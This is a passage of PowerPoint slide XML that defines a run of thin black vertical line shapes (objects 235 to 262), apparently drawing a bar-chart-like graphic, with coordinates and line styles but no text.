          <p:cNvPr id="235" name="object 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909258" y="5206785"/>
            <a:ext cx="1258" cy="525990"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="265430">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="265214"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="object 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937436" y="5152109"/>
            <a:ext cx="0" cy="581357"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="293369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="292805"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="object 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937163" y="5152356"/>
            <a:ext cx="3775" cy="580099"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="292735">
                <a:moveTo>
                  <a:pt x="1374" y="292405"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="292405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="292681"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="object 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964796" y="5104941"/>
            <a:ext cx="0" cy="627916"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="316864">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="316608"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="object 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964223" y="5107365"/>
            <a:ext cx="1258" cy="625399"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="315594">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="315385"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="object 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3992648" y="5060442"/>
            <a:ext cx="0" cy="671958"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="339089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="339057"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="object 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3992375" y="5058223"/>
            <a:ext cx="2517" cy="674475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="340360">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="340183"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="object 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020554" y="4971417"/>
            <a:ext cx="0" cy="761301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="384175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="383983"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="object 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4018897" y="4970836"/>
            <a:ext cx="2517" cy="762559"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="384810">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="384281"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="object 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048460" y="4892029"/>
            <a:ext cx="0" cy="840577"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="424180">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="424049"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="object 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048187" y="4893661"/>
            <a:ext cx="1258" cy="839319"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="423544">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="423226"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="object 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076314" y="4814821"/>
            <a:ext cx="0" cy="918594"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="463550">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="463010"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="object 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4073573" y="4817546"/>
            <a:ext cx="2517" cy="914819"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="461644">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="461636"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="object 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4104219" y="4778369"/>
            <a:ext cx="0" cy="955087"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="481964">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="481401"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="object 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4103646" y="4777788"/>
            <a:ext cx="1258" cy="955087"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="481964">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="481698"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="object 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131578" y="4759063"/>
            <a:ext cx="0" cy="973962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="491489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="491148"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="object 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131304" y="4757379"/>
            <a:ext cx="2517" cy="975220"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="492125">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="491998"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="object 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159430" y="4722062"/>
            <a:ext cx="0" cy="1010454"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="509905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="509814"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="object 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158076" y="4722867"/>
            <a:ext cx="1258" cy="1010454"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="509905">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="509414"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="object 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4187338" y="4684526"/>
            <a:ext cx="0" cy="1048204"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="528955">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="528757"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="object 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4187065" y="4682562"/>
            <a:ext cx="1258" cy="1050721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="530225">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="529753"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="object 256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4215190" y="4669489"/>
            <a:ext cx="0" cy="1063305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="536575">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="536350"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="object 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212738" y="4669735"/>
            <a:ext cx="2517" cy="1063305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="536575">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="536225"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="object 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243095" y="4612678"/>
            <a:ext cx="0" cy="1119930"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="565150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="565012"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="object 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4242822" y="4614567"/>
            <a:ext cx="0" cy="1118672"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="564514">
                <a:moveTo>
                  <a:pt x="0" y="563789"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="564065"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="object 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4271003" y="4570830"/>
            <a:ext cx="0" cy="1162714"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="586739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="586136"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="object 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4270729" y="4572171"/>
            <a:ext cx="2517" cy="1160197"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="585469">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="585459"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="object 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298308" y="4522022"/>
            <a:ext cx="0" cy="1210531"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="610869">
                <a:moveTo>
